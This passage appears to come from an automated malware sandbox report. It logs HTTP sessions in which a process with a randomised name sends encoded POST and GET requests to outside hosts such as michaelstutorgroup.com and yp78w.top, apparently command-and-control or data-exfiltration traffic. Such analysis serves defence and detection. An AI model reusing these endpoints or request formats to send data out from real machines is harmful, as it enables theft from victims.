0, 0, 0.1); [TRUNCATED]
Jul 26, 2024 09:40:57.090173006 CEST	1236	IN	Data Raw: 0d 0a 20 20 20 20 20 20 20 20 2e 67 72 69 64 2d 69 74 65 6d 20 68 32 20 7b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 67 72 69 64 2d 69 74 65 6d 20 70 20 7b 20 6d Data Ascii: .grid-item h2 { margin: 0; font-size: 1.2em; } .grid-item p { margin: 0.5em 0 0; } .article { padding: 1em 0; } .article h2 { margin: 0; } .article p { margin: 0.5em 0 0; } .pagination { d
Jul 26, 2024 09:40:57.090219021 CEST	700	IN	Data Raw: 77 2e 77 6f 72 6c 64 68 65 61 64 6c 69 6e 65 2e 78 79 7a 2f 69 6e 64 65 78 2e 70 68 70 3f 70 61 67 65 3d 6c 61 74 65 73 74 22 3e 41 6c 6c 20 41 72 74 69 63 6c 65 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 Data Ascii: w.worldheadline.xyz/index.php?page=latest">All Articles</a> <a href="http://www.worldheadline.xyz/index.php?page=most-read">Latest Articles</a> <a href="http://www.worldheadline.xyz/index.php?page=categories">Categories</a>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49716	84.32.84.65	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:17.312856913 CEST	797	OUT	POST /bk2c/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.michaelstutorgroup.com Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.michaelstutorgroup.com Referer: http://www.michaelstutorgroup.com/bk2c/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 53 77 35 66 65 6c 37 73 36 38 42 6b 56 53 35 50 2f 72 70 36 70 74 62 76 33 64 39 55 2f 76 47 54 57 70 58 46 2b 52 57 33 68 62 43 71 33 69 7a 5a 2f 67 56 54 50 79 78 5a 55 57 4e 7a 65 67 6f 73 43 47 79 41 65 50 76 6c 52 7a 56 4d 6b 5a 52 78 34 46 32 43 6f 4c 74 46 6b 76 66 75 4c 54 6e 72 6a 56 33 37 41 77 31 69 31 6f 39 69 59 71 6b 51 62 6a 36 52 64 4d 67 37 4c 56 37 61 57 53 54 4f 4d 56 34 54 31 66 58 57 73 38 6c 69 45 53 4b 46 56 79 32 58 76 68 54 4c 4a 54 6a 61 6d 64 63 37 73 6c 2b 54 75 6e 77 2f 64 65 51 4e 36 41 2b 32 6d 63 44 68 63 4f 6d 41 72 59 57 2f 6c 63 72 66 76 68 61 46 77 38 55 3d Data Ascii: JNx8tTw=Sw5fel7s68BkVS5P/rp6ptbv3d9U/vGTWpXF+RW3hbCq3izZ/gVTPyxZUWNzegosCGyAePvlRzVMkZRx4F2CoLtFkvfuLTnrjV37Aw1i1o9iYqkQbj6RdMg7LV7aWSTOMV4T1fXWs8liESKFVy2XvhTLJTjamdc7sl+Tunw/deQN6A+2mcDhcOmArYW/lcrfvhaFw8U=
Jul 26, 2024 09:41:17.899465084 CEST	1220	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Fri, 26 Jul 2024 07:41:17 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.michaelstutorgroup.com/bk2c/ platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 94863e04d37686b9cebc02c75b527b6d-bos-edge1 x-hcdn-cache-status: DYNAMIC x-hcdn-upstream-rt: 0.157 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49717	84.32.84.65	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:19.996623039 CEST	817	OUT	POST /bk2c/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.michaelstutorgroup.com Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.michaelstutorgroup.com Referer: http://www.michaelstutorgroup.com/bk2c/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 53 77 35 66 65 6c 37 73 36 38 42 6b 48 68 68 50 34 4d 64 36 68 74 62 73 72 4e 39 55 32 50 48 37 57 75 66 46 2b 52 2b 6e 68 70 57 71 33 43 44 5a 2b 6b 35 54 4f 79 78 5a 4e 6d 4e 32 61 67 6f 7a 43 47 2b 69 65 50 44 6c 52 7a 52 4d 6b 5a 42 78 35 32 65 46 70 62 74 48 73 50 66 67 47 7a 6e 72 6a 56 33 37 41 77 68 4d 31 6f 6c 69 59 61 55 51 4a 53 37 48 44 38 67 34 4d 56 37 61 64 79 54 53 4d 56 34 68 31 62 66 34 73 2b 4e 69 45 58 32 46 45 41 4f 59 6c 68 54 52 45 7a 69 61 75 74 74 51 72 58 71 6c 74 6e 4a 64 4e 64 30 4f 79 57 54 63 38 2b 4c 4a 50 75 4b 34 37 4c 65 49 30 73 4b 32 31 43 4b 31 75 72 41 55 72 4e 71 43 4b 4f 38 4a 6e 67 6a 6c 47 48 6d 44 73 74 5a 30 Data Ascii: JNx8tTw=Sw5fel7s68BkHhhP4Md6htbsrN9U2PH7WufF+R+nhpWq3CDZ+k5TOyxZNmN2agozCG+iePDlRzRMkZBx52eFpbtHsPfgGznrjV37AwhM1oliYaUQJS7HD8g4MV7adyTSMV4h1bf4s+NiEX2FEAOYlhTREziauttQrXqltnJdNd0OyWTc8+LJPuK47LeI0sK21CK1urAUrNqCKO8JngjlGHmDstZ0
Jul 26, 2024 09:41:20.596664906 CEST	1220	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Fri, 26 Jul 2024 07:41:20 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.michaelstutorgroup.com/bk2c/ platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: cad3e60939f66dce4001c0ee1ecef0ca-bos-edge1 x-hcdn-cache-status: DYNAMIC x-hcdn-upstream-rt: 0.137 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49718	84.32.84.65	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:22.585711956 CEST	1834	OUT	POST /bk2c/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.michaelstutorgroup.com Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.michaelstutorgroup.com Referer: http://www.michaelstutorgroup.com/bk2c/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 53 77 35 66 65 6c 37 73 36 38 42 6b 48 68 68 50 34 4d 64 36 68 74 62 73 72 4e 39 55 32 50 48 37 57 75 66 46 2b 52 2b 6e 68 70 75 71 33 7a 6a 5a 2f 46 35 54 4e 79 78 5a 53 57 4e 33 61 67 6f 2b 43 47 6d 6d 65 50 66 62 52 78 5a 4d 32 4b 5a 78 77 6e 65 46 67 62 74 48 67 76 66 74 4c 54 6e 79 6a 56 6d 77 41 77 78 4d 31 6f 6c 69 59 63 51 51 5a 54 37 48 42 38 67 37 4c 56 37 47 57 53 54 32 4d 56 67 78 31 62 54 47 73 4f 74 69 45 33 47 46 58 54 32 59 70 68 54 58 48 7a 69 30 75 74 68 50 72 58 6d 54 74 6e 39 33 4e 65 6b 4f 78 44 4f 78 6a 4f 2b 65 64 38 58 61 33 38 6a 72 67 35 53 62 2b 55 65 7a 72 71 73 57 33 65 37 77 64 36 4d 65 6d 7a 6d 49 62 6d 69 6f 72 36 78 37 6a 55 72 45 48 76 67 7a 5a 6e 58 50 47 50 50 76 52 56 70 47 71 4b 58 44 49 45 72 79 2b 72 77 46 73 4d 4e 79 42 4d 4f 39 45 58 48 74 33 32 35 39 2b 51 52 6e 57 63 2f 49 34 66 30 59 6d 31 59 66 64 77 4c 48 6a 39 33 35 36 78 62 77 33 74 35 39 46 68 74 63 64 4a 68 58 45 65 57 62 53 42 6e 64 6d 66 56 67 4e 52 72 6a 73 4e 30 5a 34 56 [TRUNCATED] Data Ascii: JNx8tTw=Sw5fel7s68BkHhhP4Md6htbsrN9U2PH7WufF+R+nhpuq3zjZ/F5TNyxZSWN3ago+CGmmePfbRxZM2KZxwneFgbtHgvftLTnyjVmwAwxM1oliYcQQZT7HB8g7LV7GWST2MVgx1bTGsOtiE3GFXT2YphTXHzi0uthPrXmTtn93NekOxDOxjO+ed8Xa38jrg5Sb+UezrqsW3e7wd6MemzmIbmior6x7jUrEHvgzZnXPGPPvRVpGqKXDIEry+rwFsMNyBMO9EXHt3259+QRnWc/I4f0Ym1YfdwLHj9356xbw3t59FhtcdJhXEeWbSBndmfVgNRrjsN0Z4VcuaIbFLe+jMgE4iV390417i9MYaaNDgZS0YtHoMaH0pNjrhCp25l8596YueoEWe99pGX396bYZBvgNDgMvJG/NesSTuFWRDX+VbEw066+IkDitpQksRJp/YqnKY7kI83EzT4by4cjC2it23MlNnwMdPuv89gYVPhatqPQGnOuMNUrQx38ykOs5s41RpwyvTi9H8BCSZ6q7Kjdy+SflEpwOmo02v/+b2OxvBnxB4E4JHKNKj32/HyaB41mI8l2Ey5RE3Qkj7c0MHrK/MCQr2nRo/vebT7UGl7Ti/nAP6lKClRRAq+42GvHbvifjhT8R9Vujsz9VpOSE9FydGAJwvQepAxD/Nr/xw4s/kUvHNNaufd+aXQ9xSifDrtf6p4UynaxOAA0oFz7AH6SpfLJZmyuCxlOUD6tQ4PXdlmbdSnV8mu/Eh0tKdbptV1odEr6ReK3uYShGOJMgPk2vUXYC4Uid0fDQOlpVwBzIN/c5zlA1K+0ZCgG6DnDH8o77i11XcbSIjfPLR/EVwZp2hozXx6nbtbb7b3hp2MtXis8D5XQG33gNyzggS0zRD4mliyfl1C1YCiV7LYzBN95AH/5UdjQNtfc9vpt4InsEnSaoqqavOj0i7UtLHIasPacBEi0qsYc+ZOyk9FjigvGWqodeRsrJUatYa9PaoNpi [TRUNCATED]
Jul 26, 2024 09:41:23.205260992 CEST	1220	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Fri, 26 Jul 2024 07:41:23 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.michaelstutorgroup.com/bk2c/ platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 4134ab842747cd0f2cb240a5e9dbc94a-bos-edge1 x-hcdn-cache-status: DYNAMIC x-hcdn-upstream-rt: 0.145 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	84.32.84.65	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:25.167515993 CEST	518	OUT	GET /bk2c/?JNx8tTw=fyR/dS20qv8EXSd8u+Bcgvv3xf0q4er0Bfje+Rii9aayzDLrig5kNBZNNidIJWoLGG2wTsvUDg8b8pJZ+WjXr6oyts3SJgHwjkutIwVayIFFDsRDIWHfWbE9GGLqUV2/ag==&F0a=DDvTXr_Hk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.michaelstutorgroup.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Jul 26, 2024 09:41:25.817111015 CEST	1236	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Fri, 26 Jul 2024 07:41:25 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.michaelstutorgroup.com/bk2c/?JNx8tTw=fyR/dS20qv8EXSd8u+Bcgvv3xf0q4er0Bfje+Rii9aayzDLrig5kNBZNNidIJWoLGG2wTsvUDg8b8pJZ+WjXr6oyts3SJgHwjkutIwVayIFFDsRDIWHfWbE9GGLqUV2/ag==&F0a=DDvTXr_Hk platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 889d386fe9cf986b7f6cb0244fe3af81-bos-edge1 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.137 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style
Jul 26, 2024 09:41:25.817336082 CEST	136	IN	Data Raw: 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 Data Ascii: ="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	38.181.21.136	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:31.033329964 CEST	758	OUT	POST /uum0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.yp78w.top Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.yp78w.top Referer: http://www.yp78w.top/uum0/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 54 2b 4f 72 4e 44 75 46 68 73 64 47 78 36 37 6e 41 7a 65 34 43 33 30 48 70 69 47 65 35 2f 50 6f 77 57 74 49 51 51 55 6a 49 78 6a 41 31 51 55 51 32 6d 52 71 54 38 72 47 52 79 75 34 4a 48 39 56 65 78 6d 6e 79 2f 79 71 54 62 4c 51 68 4f 31 71 65 4c 65 52 6c 54 76 78 73 59 7a 6a 35 57 6b 76 58 6c 69 57 77 68 63 4d 6f 38 49 38 74 4a 63 32 7a 73 38 6e 35 50 45 76 6d 46 70 65 63 74 62 68 31 6c 48 79 67 78 49 52 67 66 6f 70 61 68 50 67 47 49 39 31 67 77 41 72 50 61 55 50 43 4c 73 5a 48 4f 36 45 37 66 37 59 54 74 4e 31 77 51 39 6a 64 4f 36 55 45 74 7a 61 68 76 70 4c 78 38 47 66 65 33 6f 62 48 56 30 3d Data Ascii: JNx8tTw=T+OrNDuFhsdGx67nAze4C30HpiGe5/PowWtIQQUjIxjA1QUQ2mRqT8rGRyu4JH9Vexmny/yqTbLQhO1qeLeRlTvxsYzj5WkvXliWwhcMo8I8tJc2zs8n5PEvmFpectbh1lHygxIRgfopahPgGI91gwArPaUPCLsZHO6E7f7YTtN1wQ9jdO6UEtzahvpLx8Gfe3obHV0=
Jul 26, 2024 09:41:32.250417948 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Jul 2024 07:41:31 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6679219a-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jul 26, 2024 09:41:32.252820969 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Jul 2024 07:41:31 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6679219a-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49721	38.181.21.136	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:33.620192051 CEST	778	OUT	POST /uum0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.yp78w.top Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.yp78w.top Referer: http://www.yp78w.top/uum0/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 54 2b 4f 72 4e 44 75 46 68 73 64 47 78 61 72 6e 42 52 32 34 54 48 30 47 31 79 47 65 67 76 50 6b 77 57 52 49 51 51 38 7a 49 43 4c 41 30 78 6b 51 6b 6e 52 71 55 38 72 47 4a 43 75 39 55 58 39 6b 65 78 71 46 79 36 53 71 54 59 33 51 68 50 70 71 64 34 32 53 6d 6a 76 2f 6e 34 7a 62 6e 6d 6b 76 58 6c 69 57 77 68 59 32 6f 34 63 38 78 70 73 32 79 4f 59 6f 6d 2f 45 6f 6a 31 70 65 4f 64 62 66 31 6c 47 64 67 77 45 2f 67 63 63 70 61 6a 58 67 46 63 70 32 70 77 41 70 4c 61 55 52 44 37 35 77 50 50 54 46 6b 70 7a 61 45 4f 39 71 38 47 51 4a 48 73 79 38 58 4e 66 69 78 38 68 38 67 4d 6e 32 45 55 34 72 5a 43 69 4a 69 73 2b 42 78 48 76 76 65 63 32 74 58 68 31 33 65 74 51 53 Data Ascii: 